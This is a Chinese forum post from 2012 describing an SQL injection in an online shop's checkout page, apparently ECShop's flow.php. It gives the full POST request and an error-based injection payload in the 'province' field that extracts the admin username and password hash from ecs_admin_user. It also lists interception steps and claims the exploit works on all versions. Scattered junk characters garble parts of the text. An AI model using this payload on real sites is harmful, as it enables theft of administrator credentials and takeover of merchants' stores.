感谢欠杀的黑盒
0 k2 I. D; r0 [
1 Q) r& N' k+ d5 J9 T
' \" D, H! r+ O) C6 t把任意商品加入购物车在填写配送地址那一页,有地区选择
, M8 R% ]) n& }2 a9 L
6 o* ~6 E9 B3 |/ {% M; Bflow.php?step=consignee&direct_shopping=1
$ d2 X! P! d3 V# K6 r8 A1 s比如省选择安徽7 T9 F2 j. v G' l8 m
" X1 {" a% Z# W7 c其中POST数据如下2 b. g* ~: B* f- p: u/ }5 ~3 l# X& k, j
' h& M* J* ]# K6 w# a0 i1 Y
country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=34 y( c( @% M& ^; U, o" p U
改成* c, ]8 q4 o6 I: ~) X, Q
, I& T% n! W% I: D1 `, ]
province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 ## o5 e) ?! g) E3 x8 p
ps:详细的方法,用火狐tamper data插件……..即可改post内容…... n& y; M- J- h1 u' R+ Z& E
# v' B1 a d6 l: _5 w
先注册账户,随便选个商品进购物车,然后填地址,电话什么的,填好开始抓包,改包* n2 I' W2 p4 p0 x# _2 Z
$ I" Z5 Q' S# ~6 A- P- E( d# @% G
就会回显错误页面了。。。。
( H9 r$ b& X: U" { 9 z$ v( L) F0 ~. S0 z) _6 i. ~: X
我自己没用这个日站过,就测试了一个最新版和老版本,均ok,所以写全版本,理论上应该是的5 q, a9 W' `; n4 o# E: p @
|
发表于 2012-12-31 09:19:27
收藏
支持
反对